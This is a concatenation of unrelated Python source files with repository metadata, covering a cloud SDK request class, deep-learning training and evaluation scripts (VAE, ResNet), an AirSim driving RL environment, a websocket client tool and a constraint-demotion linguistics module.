if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_All(self):
return self.get_query_params().get('All')
def set_All(self,All):
self.add_query_param('All',All)
def get_ResourceIds(self):
return self.get_query_params().get('ResourceIds')
def set_ResourceIds(self, ResourceIds):
for depth1 in range(len(ResourceIds)):
if ResourceIds[depth1] is not None:
self.add_query_param('ResourceId.' + str(depth1 + 1) , ResourceIds[depth1])
def get_ResourceType(self):
return self.get_query_params().get('ResourceType')
def set_ResourceType(self,ResourceType):
self.add_query_param('ResourceType',ResourceType)
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_TagKeys(self):
return self.get_query_params().get('TagKeys')
def set_TagKeys(self, TagKeys):
for depth1 in range(len(TagKeys)):
if TagKeys[depth1] is not None:
self.add_query_param('TagKey.' + str(depth1 + 1) , TagKeys[depth1])
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
7687d9795fd4f458ba5d860228bb5c67c20fb1f1
|
5851ed4f3398b3e96cb0f5c09b10289cadd89d6a
|
/digits/model/tasks/__init__.py
|
f8aaa77608973c67dd4c4885bef7604e12eba769
|
[
"LicenseRef-scancode-generic-cla"
] |
no_license
|
wills2133/digits-distributed
|
953060830dde0c96957accfb621f4f00cc74837a
|
addf2fda32291a02a7c602b9d58d37ca71afe79d
|
refs/heads/master
| 2021-09-13T00:05:42.812330
| 2018-01-31T14:16:25
| 2018-01-31T14:16:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 686
|
py
|
# Copyright (c) 2014-2017, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
from .caffe_train import CaffeTrainTask
##########################################
from .distrib_caffe_train import DistributedTrainTask
##########################################
from .torch_train import TorchTrainTask
from .train import TrainTask
import ssd_pascal
__all__ = [
'CaffeTrainTask',
'DistributedTrainTask', ##########
'TorchTrainTask',
'TrainTask',
]
from digits.config import config_value # noqa
if config_value('tensorflow')['enabled']:
from .tensorflow_train import TensorflowTrainTask # noqa
__all__.append('TensorflowTrainTask')
|
[
"wills2133@hotmail.com"
] |
wills2133@hotmail.com
|
20b656ddbab9eae32f2eb0fa454be28a9a548ccc
|
333a9bf3ce71f2aefc0b105fe4058c2aacc5ddb1
|
/vae_eval.py
|
ed02672e2ae5d2e68493bce36009bf47b97c521f
|
[
"MIT"
] |
permissive
|
shijack/vae-system
|
33a5cb53a52cfbc23952cdcc8bb3daf80ef75926
|
14506b3b5966162a3502b26dd68d1a77ccbcfb34
|
refs/heads/master
| 2020-04-02T01:44:26.306971
| 2018-10-24T12:49:51
| 2018-10-24T12:49:51
| 153,872,748
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,449
|
py
|
import tensorflow as tf
import numpy as np
import scipy
import cv2
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
LATENT_DIM = 256
ROWS, COLS = 10, 10
HEIGHT, WIDTH, DEPTH = 144, 112, 3
N, M = 10, 30
splines = []
x = range(N)
xs = np.linspace(0, N, N * M)
for i in range(ROWS * COLS * LATENT_DIM):
y = np.random.normal(0.0, 1.0, size=[N]).astype(np.float32)
s = scipy.interpolate.UnivariateSpline(x, y, s=2)
ys = s(xs)
splines.append(ys)
splines = np.array(splines)
def read_record_new(images_path='./data', depth=1):
train_total_data = []
for img_path in os.listdir(images_path):
img = cv2.imread(os.path.join(images_path, img_path))
if depth == 1:
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = cv2.resize(img, (112, 144)) / 255.0
train_total_data.append(img)
train_total_data = np.array(train_total_data)
if depth == 1:
train_total_data = np.expand_dims(train_total_data, axis=3)
return train_total_data
with tf.Session() as sess:
saver = tf.train.import_meta_graph('./model_new/gan-20000.meta')
saver.restore(sess, tf.train.latest_checkpoint('./model_new'))
graph = tf.get_default_graph()
# latent_input = graph.get_tensor_by_name('latent_input:0')
x_input = graph.get_tensor_by_name('encoder/input_img:0')
# laten_mean = graph.get_tensor_by_name('encoder/mean:0')
# laten_stddev = graph.get_tensor_by_name('encoder/stddev:0')
image_eval = graph.get_tensor_by_name('decoder/reconstruct/conv5/act:0')
latent_feature = graph.get_tensor_by_name('variance/latent_feature:0')
imgs = read_record_new(depth=3)
# for i in range(N * M):
for i in range(N * M / 2):
time_point = splines[..., i]
time_point = np.reshape(time_point, [ROWS * COLS, LATENT_DIM])
# data = sess.run(image_eval, feed_dict={latent_input: time_point})
data = imgs[:10, ...]
# data_mean,data_stdddev = sess.run([laten_mean,laten_stddev], feed_dict={x_input: data})
# data = data_mean+ data_stdddev
data = sess.run(latent_feature, feed_dict={x_input: data})
np.savetxt('./eval/feature_1_%d' % i, data)
# data = np.reshape((data * 255).astype(int), (ROWS, COLS, HEIGHT, WIDTH, DEPTH))
# data = np.concatenate(np.concatenate(data, 1), 1)
# cv2.imwrite('./eval/eval_img_' + str(i) + '.png', data)
# cv2.imshow('eval_img', data)
# cv2.moveWindow('eval_img', 0, 0)
# key = cv2.waitKey(0)
# if key == 27:
# break
def test_image(path_image, num_class):
img_string = tf.read_file(path_image)
img_decoded = tf.image.decode_png(img_string, channels=3)
img_resized = tf.image.resize_images(img_decoded, [224, 224])
img_resized = tf.reshape(img_resized, shape=[1, 224, 224, 3])
# model = Vgg19(bgr_image=img_resized, num_class=num_class, vgg19_npy_path='./vgg19.npy')
# score = model.fc8
# prediction = tf.argmax(score, 1)
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
saver.restore(sess, "./tmp/checkpoints/model_epoch50.ckpt")
cv2.imwrite('img.png', img_decoded.eval())
# plt.imshow(img_decoded.eval())
# plt.title("Class:" + class_name[sess.run(prediction)[0]])
# plt.show()
# test_image('./validate/11.jpg', 2)
|
[
"690141808@qq.com"
] |
690141808@qq.com
|
31ca9b836c834e4a4bf5e8b867b7bc82bcc0f319
|
e2d069bc194216a5235a20d6075932ab6e146866
|
/03_递归.py
|
5648ae31ce082eb55b447efece54a74f77fd06b6
|
[] |
no_license
|
ruoduan-hub/algorithm_py
|
e1642c62614024dbb3c4b724863a523524c9b359
|
600b20fad179a88ac2c1694154115de3b0a6359f
|
refs/heads/master
| 2023-07-23T15:05:46.490345
| 2021-09-06T11:50:19
| 2021-09-06T11:50:19
| 211,216,812
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
# coding=UTF-8
"""
编写涉及数组的递归时,基线条件通常是数组为空或者是只包含一个元素。陷入困境时,请检查基线条件是不是这样的。
"""
def count_down(i):
print(i)
if i <= 1: # 基线条件 (base case)
return
else: # 递归条件 (recursive csae)
count_down(i - 1)
count_down(100)
|
[
"chad97@126.com"
] |
chad97@126.com
|
ca7862cad14001a86cfc5966a988df66ea996a7f
|
ce4913de9832a5e67b234ba911f4a5cd0bfa82f3
|
/envs/airsim/airsimcarenv.py
|
425b669390cb3cf42e49ea775fffd91ee4ea5159
|
[] |
no_license
|
Arlen0615/DRL-AutonomousVehicles
|
6c31fe7f154af6ac43298f814edd13cbf0d35cf8
|
96d698896edccfab693558181924b8b411aae7a4
|
refs/heads/master
| 2021-08-11T22:28:39.778934
| 2017-11-14T06:04:32
| 2017-11-14T06:04:32
| 110,491,854
| 0
| 0
| null | 2017-11-13T02:46:11
| 2017-11-13T02:46:11
| null |
UTF-8
|
Python
| false
| false
| 4,560
|
py
|
import logging
import math
import numpy as np
import random
import gym
from gym import spaces
from gym.utils import seeding
from gym.spaces import Tuple, Box, Discrete, MultiDiscrete, Dict
from gym.spaces.box import Box
from envs.airsim.myAirSimCarClient import *
logger = logging.getLogger(__name__)
class AirSimCarEnv(gym.Env):
airsimClient = None
def __init__(self):
# left depth, center depth, right depth, steering
self.low = np.array([0.0, 0.0, 0.0, 0])
self.high = np.array([100.0, 100.0, 100.0, 21])
self.observation_space = spaces.Box(self.low, self.high)
self.action_space = spaces.Discrete(21)
self.state = (100, 100, 100, random.uniform(-1.0, 1.0))
self.episodeN = 0
self.stepN = 0
self.allLogs = { 'speed':[0] }
self._seed()
self.stallCount = 0
global airsimClient
airsimClient = myAirSimCarClient()
def _seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def computeReward(self, mode='roam'):
speed = self.car_state.speed
steer = self.steer
dSpeed = 0
if mode == 'roam' or mode == 'smooth':
# reward for speed
reward = speed/60
# penalize sharp steering, to discourage going in a circle
if abs(steer) >= 1.0 and speed > 100:
reward -= abs(steer) * 2
# penalize collision
if len(self.allLogs['speed']) > 0:
dSpeed = speed - self.allLogs['speed'][-2]
else:
dSpeed = 0
reward += dSpeed
# penalize for going in a loop forever
#reward -= abs(self.steerAverage) * 10
else:
reward = 1
# Placehoder. To be filled
if mode == 'smooth':
# also penalize on jerky motion, based on a fake G-sensor
steerLog = self.allLogs['steer']
g = abs(steerLog[-1] - steerLog[-2]) * 5
reward -= g
return [reward, dSpeed]
def _step(self, action):
assert self.action_space.contains(action), "%r (%s) invalid"%(action, type(action))
self.stepN += 1
steer = (action - 10)/5.0
gas = 0.45555
airsimClient.setCarControls(gas, steer)
car_state = airsimClient.getCarState()
self.car_state = car_state
self.steer = steer
speed = car_state.speed
if speed < 5:
self.stallCount += 1
else:
self.stallCount = 0
if self.stallCount > 13:
done = True
else:
done = False
self.sensors = airsimClient.getSensorStates()
cdepth = self.sensors[1]
self.state = self.sensors
self.state.append(action)
self.addToLog('speed', speed)
self.addToLog('steer', steer)
steerLookback = 17
steerAverage = np.average(self.allLogs['steer'][-steerLookback:])
self.steerAverage = steerAverage
# Training using the Roaming mode
reward, dSpeed = self.computeReward('roam')
self.addToLog('reward', reward)
rewardSum = np.sum(self.allLogs['reward'])
# Terminate the episode on large cumulative amount penalties,
# since car probably got into an unexpected loop of some sort
if rewardSum < -1000:
done = True
sys.stdout.write("\r\x1b[K{}/{}==>reward/depth/steer/speed: {:.0f}/{:.0f} \t({:.1f}/{:.1f}/{:.1f}) \t{:.1f}/{:.1f} \t{:.2f}/{:.2f} ".format(self.episodeN, self.stepN, reward, rewardSum, self.state[0], self.state[1], self.state[2], steer, steerAverage, speed, dSpeed))
sys.stdout.flush()
# placeholder for additional logic
if done:
pass
return np.array(self.state), reward, done, {}
def addToLog (self, key, value):
if key not in self.allLogs:
self.allLogs[key] = []
self.allLogs[key].append(value)
def _reset(self):
airsimClient.reset()
self.stepN = 0
self.stallCount = 0
self.episodeN += 1
print("")
self.allLogs = { 'speed': [0] }
# Randomize the initial steering to broaden learning
self.state = (100, 100, 100, random.uniform(0.0, 21.0))
return np.array(self.state)
|
[
"kaihu@smesh.net"
] |
kaihu@smesh.net
|
b39d75d312bbf42e01d04bc586a80ba6c93b0ed2
|
e0330ee0cdc9521692595df137180fa0d00864e8
|
/ENV/bin/wsdump.py
|
516407141b978a7bdf49300d9872a925f8b2aba5
|
[] |
no_license
|
lesps/Jeeves.Witherspoon
|
ce8fb4fc13b0824ffbf19a2a95c4df5b21f1b4c6
|
4012bb5f2bef1a61d7af849668740f6f156511fd
|
refs/heads/master
| 2020-05-27T10:34:12.492532
| 2013-07-27T20:20:15
| 2013-07-27T20:20:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,132
|
py
|
#!/home/spencer/python/Jeeves/ENV/bin/python
import argparse
import code
import sys
import threading
import websocket
try:
import readline
except:
pass
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = getattr(sys.stdin, "encoding", "").lower()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values==None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v")+1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
return parser.parse_args()
class InteractiveConsole(code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m" + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def raw_input(self, prompt):
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, unicode):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, unicode):
line = encode("utf-8")
return line
def main():
args = parse_args()
console = InteractiveConsole()
if args.verbose > 1:
websocket.enableTrace(True)
ws = websocket.create_connection(args.url)
print("Press Ctrl+C to quit")
def recv():
frame = ws.recv_frame()
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return (frame.opcode, frame.data)
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return (frame.opcode, None)
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong("Hi!")
return None, None
def recv_ws():
while True:
opcode, data = recv()
msg = None
if not args.verbose and opcode in OPCODE_DATA:
msg = "< %s" % data
elif args.verbose:
msg = "< %s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg:
console.write(msg)
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
while True:
try:
message = console.raw_input("> ")
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
[
"lesp@seas.upenn.edu"
] |
lesp@seas.upenn.edu
|
7c3d454eab4479bf2d1ee619b4491847e62b46a7
|
990be294e69d48676a0f8176c37110328956e71a
|
/setup.py
|
0f4229bd5622ea158ea444f05713573247bda4b3
|
[] |
no_license
|
akshaypermunda/datascience
|
09898d9dd660e7ca441e22beed9d409174a46031
|
e06703b336d706131a708640c15567065d469f88
|
refs/heads/master
| 2022-12-15T08:28:03.846168
| 2020-09-13T16:25:45
| 2020-09-13T16:25:45
| 295,188,700
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 324
|
py
|
from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='A dashboard which provides an interactive visualization of COVID-19 Data which can be customized accroding to local interests.',
author='Akshay Permunda',
license='',
)
|
[
"noreply@github.com"
] |
noreply@github.com
|
dc65124f1049308aad58600a95ccf125c9d4d3b1
|
b84305736a16279a7e3eb94b597e0a59df15676c
|
/src/BCD.py
|
a4141aaa844b1ea137f62cad07b148485872790d
|
[] |
no_license
|
ellenmdai/BiasedConstraintDemotion
|
cefcacf9f468f3fef316b352990f8cdee3bc2c33
|
ebd39f2d4a6fdf4009f56265e60cf8dae4cd078f
|
refs/heads/master
| 2022-04-26T08:37:52.234488
| 2020-05-01T21:15:57
| 2020-05-01T21:15:57
| 260,560,460
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,028
|
py
|
import numpy as np
from pandas import DataFrame, read_csv
from collections import Counter
from itertools import combinations
class BCD(object):
"""A class that performs Biased Constraint Demotion on given data.
Attributes:
vt (DataFrame): violation tableau of data (optional);
ct (DataFrame): constraint tableau of data;
markednessConstraints (set): constraint names of all constraints denoted by a 'm:' prefix (or at least not 'f:');
strata (list of sets): list of each stratum of constraints in order, with more dominant strata coming first;
"""
def __init__(self, vtPath = None, ctPath = None):
"""
Parameters:
----------
vtPath : str, optional
Path to a .csv containing a violation tableau. If both this and ctPath are given, ctPath will be ignored.
Default is None.
ctPath : str, optional
Path to a .csv containing a constraint tableau. Default is None. If ctPath is None here, then it must be
initialized with either loadCt() or generateCtFromVt().
"""
self.vt = None
self.ct = None
self.markednessConstraints = None
self.strata = []
if (vtPath):
self.vt = read_csv(vtPath)
elif (ctPath):
self.ct = read_csv(ctPath)
self.markednessConstraints = set([con for con in self.ct.columns.values[3:] if not con.startswith('f:')])
def loadVt(self, vtPath):
self.vt = read_csv(vtPath)
def loadCt(self, ctPath):
self.ct = read_csv(ctPath)
# from constraint names, consider it a markedness constraint if not marked as faithfulness (i.e. does not start with "f:")
self.markednessConstraints = set([con for con in self.ct.columns.values[3:] if not con.startswith('f:')])
def generateCtFromVt(self):
""" Uses self.vt to generate a constraint tableau stored in self.ct, and the set of markedness constraints stored
in self.markednessConstraints.
Raises
------
Exception: If for an input, any number other than exactly one row marked as the optimal output.
"""
vt = self.vt.sort_values(by=['Input', 'Optimal']) # for every input, the optimal output will appear first.
self.ct = DataFrame(columns=['Input', 'Winner', 'Loser'] + list(vt.columns.values[3:]))
optimalRow = None
for i, row in vt.iterrows():
if (optimalRow is not None and row['Input'] == optimalRow['Input']): # the optimal for this group
if (not np.isnan(row['Optimal'])):
raise Exception("cannot have multiple optimal outputs for singe input:", row['Input'])
mdpData = optimalRow.values[3:] - row.values[3:]
mdpData = ['L' if v > 0 else 'W' if v < 0 else '' for v in mdpData]
self.ct.loc[i] = [row['Input'], optimalRow['Output'], row['Output']] + mdpData
elif (row['Optimal'] == np.nan):
raise Exception("must have some optimal output info for:", row['Input'])
else:
optimalRow = row
self.markednessConstraints = set([con for con in self.ct.columns.values[3:] if not con.startswith('f:')])
def saveCt(self, path):
self.ct.to_csv(path, index=False)
def saveOrganizedTableau(self, path):
self.organizeTableau(self.ct, self.strata).to_csv(path, index=False)
def doBCD(self):
""" Runs the overall BCD algorithm, filling self.strata. """
ct = self.ct.copy()
self.strata = []
faithSets = [] # stack for when determining which set of faithfulness constraints should be ranked
# while we're there are still constraints not yet placed
while (faithSets or len(ct.columns) > 3):
# if we have multiple f-sets to choose from based on the last iteration, continue BCD for each option and
# retain the strata of the optimal one.
if (faithSets):
bestFaithSet = self.findMinFaithSubset(faithSets)
self.strata += bestFaithSet[0]
ct = bestFaithSet[1]
continue
iterationResult = self.findNextStratum(ct)
if (type(iterationResult) == set ): # we got back a single set of constraints to be the next stratum
self.strata.append(iterationResult)
# removed resolved data from considerion in future iterations
self.removeResolvedRowsAndCols(ct, iterationResult)
else: # we got back a list of possible sets. Store the sets to find which frees up the most m-constraints in the next iteration.
for faithSet in iterationResult:
workingCt = ct.copy()
self.removeResolvedRowsAndCols(workingCt, faithSet)
faithSets.append(([faithSet], workingCt, 0)) # (potential strata, working ct, # freed markedness constraints)
def findNextStratum(self, workingCt):
""" Determines the best set(s) of constraints for the next stratum.
Parameters:
----------
workingCt (DataFrame): a constraint tableau containing only unranked constraints and unresolved mark-data pairs.
Returns:
----------
rankNext (list of sets): the potential sets of constraints for the next stratum, either of m-constraints, f-constraits,
or multiple sets of f-constraints if multiple would free up m-constraints later.
"""
fuseAll = workingCt.iloc[:, 3:].apply(lambda col: self.fusion(col)) # don't fuse winner, loser, input info
noL = fuseAll[fuseAll != 'L'] # all constraints that prefer no losers
noLMarkedness = self.markednessConstraints.intersection(set([constraintName[0] for constraintName in noL.iteritems()]))
if (noLMarkedness): # if at least of of NoL is a markedness constraint
rankNext = noLMarkedness
# otherwise, no markedness constraint can be placed right now, so...
# if there are still some constraints that prefer losers and if at least one of NoL prefers a winner
elif (len(noL) < len(fuseAll) and (len(noL[noL == 'W']) > 0)) :
freeingFaithSets = self.findPotentialMinFaithSubsets(noL, workingCt)
if (len(freeingFaithSets) == 1):
rankNext = freeingFaithSets[0]
else:
return freeingFaithSets
else:
rankNext = set(noL.index)
return rankNext
def findPotentialMinFaithSubsets(self, noL, ct):
""" Finds the smallest sized subsets of f-constraints that frees up an m-constraint for the next iteration.
Parameters:
----------
noL (Series): Series where the indices are constraints that prefer no losers for the given ct and the values are either
'W' or 'e'.
ct: A constraint tableau containing only unranked constraints and unresolved mark-data pairs.
Returns:
----------
freeingFaithSets (list): All subsets of a certain size that free at least one m-constraint for the next iteraton.
This may contain just one or multiple sets.
"""
activeFaith = noL[noL == 'W']
fSetSize = 0
freeingFaithSets = []
# starting with size 1, test all combinations of constraints of that size until at least one combination frees an m-constraint
while (fSetSize < len(activeFaith) and len(freeingFaithSets) == 0):
fSetSize += 1
faithSets = combinations(activeFaith.index, fSetSize)
# for each possible set, see if placing them as a stratum would free an m-constraint
for f in faithSets:
ctFreedomTest = ct.copy()
self.removeResolvedRowsAndCols(ctFreedomTest, f)
testFuseAll = ctFreedomTest.iloc[:, 3:].apply(lambda col: self.fusion(col))
freedMConstraints = self.markednessConstraints.intersection(set( \
[constraintName[0] for constraintName in testFuseAll[testFuseAll != 'L'].iteritems()]))
# if f frees up a markedness constraint, add to freeingfaithsets
if (len(freedMConstraints) > 0):
freeingFaithSets.append(set(f))
if (len(freeingFaithSets) == 0):
# if no such subset exists, return all f-constraints that preferred a winner
return [set(activeFaith.index)]
return freeingFaithSets
def findMinFaithSubset(self, faithSets):
""" From multiple potential f-constraint subsets, picks out the one that frees the most m-constraints before having
to place another f-constraint, which is assumed to be the optimal choice. If multiple sets free the same number
of m-constraints, this returns the first one encountered.
Parameters:
----------
faithSets (list): A list (treated as a Stack) of tuples in the form (workingStrata, workingCt, numFreedMConstraints) where:
workingStrata (list): stratified hierachy of constraints, starting with the initial f-set in question, and any other
m-constraint sets placed after.
workingCt (DataFrame): a constraint tableau containing only columns not yet ranked either in self.strata or workingStrata and the
mark-data pairs not yet resolved by them.
numFreedMConstraints: The number of markedness constraints able to be ranked by placing workingStrata's initial f-constraint
set.
Returns:
----------
bestFaithSet (tuple): A tuple in the form (workingStrata, workingCt, numFreedMConstraints) of the f-set that frees the most m-constraints.
"""
bestFaithSet = ([], None, -1) # any real faithSet will beat this placeholder
while (faithSets): # while we're still choosing between faithSets
(workingStrata, workingCt, numFreedMConstraints) = faithSets.pop()
iterationResult = self.findNextStratum(workingCt)
# if we get back a single stratum of only markedness constraints, add to numFreedMConstraints and continue iterating
if (type(iterationResult) == set and self.markednessConstraints.intersection(iterationResult) == iterationResult):
self.removeResolvedRowsAndCols(workingCt, iterationResult)
workingStrata.append(iterationResult)
faithSets.append((workingStrata, workingCt, numFreedMConstraints + len(iterationResult)))
# if we'd have to place a faithfulness constraint, we've reached the end of our testing for the original faithSet
# candidate, so update the best faithSet if this one's better
elif (numFreedMConstraints > bestFaithSet[2]):
bestFaithSet = (workingStrata, workingCt, numFreedMConstraints)
return bestFaithSet
def printStrata(self):
print("STRATA:")
for ranking, stratum in enumerate(self.strata, start=1):
print('Rank', ranking, stratum)
def calculateRMeasure(self):
""" Calculates the R-Measure of this particular ranking, which is the sum of the number of m-constraints that dominates
each f-constraint.
Returns:
----------
r (int): R-Measure of self.strata
"""
self.r = 0
dominatingMCount = 0
for stratum in self.strata:
mCount = 0
for constraint in stratum:
if constraint in self.markednessConstraints:
mCount += 1
else:
self.r += dominatingMCount
dominatingMCount += mCount
return self.r
@staticmethod
def fusion(constraint): # constraint = a column and its values
""" logical operation combining ERCs of multiple data points, as described in RCD the Movie by Alan Prince (2009).
Parameters:
----------
constraint (series): a column from a constraint tableau where the header is the constraint name and each value comes from
a row, where 'W' means the winner is preferred by this constraint and 'L' means the loser is preferred.
Returns:
----------
'L' if a loser is preferred by any row;
'e' if neither is prefered by any row;
'W' if at least one winner and no losers are preferred.
"""
count = Counter(constraint)
if 'L' in count:
return 'L'
if 'W' not in count:
return 'e'
return 'W'
@staticmethod
def removeResolvedRowsAndCols(ct, resolvedConstraints):
""" Gets rid of data resolved by a certain stratum in a constraint tableau. So that it won't be considered in future steps.
Parameters:
----------
ct (DataFrame): the working constraint tableau.
resolvedConstraints (set): Names of constraints whose columns and resolved rows are to be eliminated.
"""
for constraint in resolvedConstraints:
winnerPreferredIndices = ct[ct[constraint] == 'W'].index
ct.drop(winnerPreferredIndices, inplace=True)
ct.drop(constraint, axis=1, inplace=True)
@staticmethod
def organizeTableau(originalCt, strata):
""" Reorders a constraint tableau to make following the BCD algorithm manually easier. Constraints are sorted left to right
from most to least dominant, and mark-data pairs are sorted top to bottom by the stratum number that resolves it (i.e.
rows resolved by more dominant strata are placed towards the top). An additonal 'Rank' column is also added indicating
which stratum resolves that row.
Parameters:
----------
originalCt (DataFrame): the constraint tableau that contains all data. This will remain untouched; a copy will be edited.
strata (list): The stratified hierarchy, where each stratum is a set, whose order will be used to sort the constraint
tableau.
Returns:
----------
ct (DataFrame): A sorted version of originalCt with an additional 'Rank' column.
"""
ct = originalCt.copy()
ct['Rank'] = 0
columnOrder = list(ct.columns)[:3]
for ranking, stratum in enumerate(strata, start=1):
columnOrder += list(stratum)
for constraint in stratum:
winnerPreferredIndices = ct[(ct[constraint] == 'W') & (ct['Rank'] == 0)].index
for i in winnerPreferredIndices:
ct.loc[i, 'Rank'] = ranking
ct = ct.sort_values('Rank')
columnOrder.append('Rank')
ct = ct.reindex(columns=columnOrder)
return ct.fillna('')
|
[
"12478985+ellenmdai@users.noreply.github.com"
] |
12478985+ellenmdai@users.noreply.github.com
|
50e8e04c4deab7182142c61d85c30d3bfdd2d297
|
e5478c3d51ab4a2e1408264f13531659c6ccd56e
|
/resnet.py
|
1b7d5061eb6313023fc2717ec04923875e7795d1
|
[] |
no_license
|
qy734504548/cloud-and-cloud-shadow
|
e4b21b0d106183ebd2e58183302a9aa3ee8f83ad
|
79698b661ec14bbf6596d2a0e8ad699fe085504e
|
refs/heads/master
| 2023-01-13T04:52:37.230604
| 2020-11-07T07:59:47
| 2020-11-07T07:59:47
| 310,792,842
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,597
|
py
|
import torch
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
__all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',
'resnet152']
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class SPBlock(nn.Module):
def __init__(self, inplanes, outplanes):
super(SPBlock, self).__init__()
midplanes = outplanes
self.conv1 = nn.Conv2d(inplanes, midplanes, kernel_size=(3, 1), padding=(1, 0), bias=False)
self.bn1 = nn.BatchNorm2d(midplanes)
self.conv2 = nn.Conv2d(inplanes, midplanes, kernel_size=(1, 3), padding=(0, 1), bias=False)
self.bn2 = nn.BatchNorm2d(midplanes)
self.conv3 = nn.Conv2d(midplanes*2, outplanes, kernel_size=1, bias=True)
self.pool1 = nn.AdaptiveAvgPool2d((None, 1))
self.pool2 = nn.AdaptiveAvgPool2d((1, None))
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
_, _, h, w = x.size()
x1 = self.pool1(x)
x1 = self.conv1(x1)
x1 = self.bn1(x1)
x1 = x1.expand(-1, -1, h, w)
x2 = self.pool2(x)
x2 = self.conv2(x2)
x2 = self.bn2(x2)
x2 = x2.expand(-1, -1, h, w)
x = torch.cat([x1,x2],dim=1)
x = self.relu(x)
x = self.conv3(x).sigmoid()
return x
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None,spm_on=False):
super(Bottleneck, self).__init__()
self.conv1 = conv1x1(inplanes, planes)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = conv1x1(planes, planes * self.expansion)
self.bn3 = nn.BatchNorm2d(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.spm = None
if spm_on:
self.spm = SPBlock(planes, planes)
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
if self.spm is not None:
out = out * self.spm(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, zero_init_residual=False,spm_on=False):
super(ResNet, self).__init__()
self.spm_on = spm_on
self.inplanes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
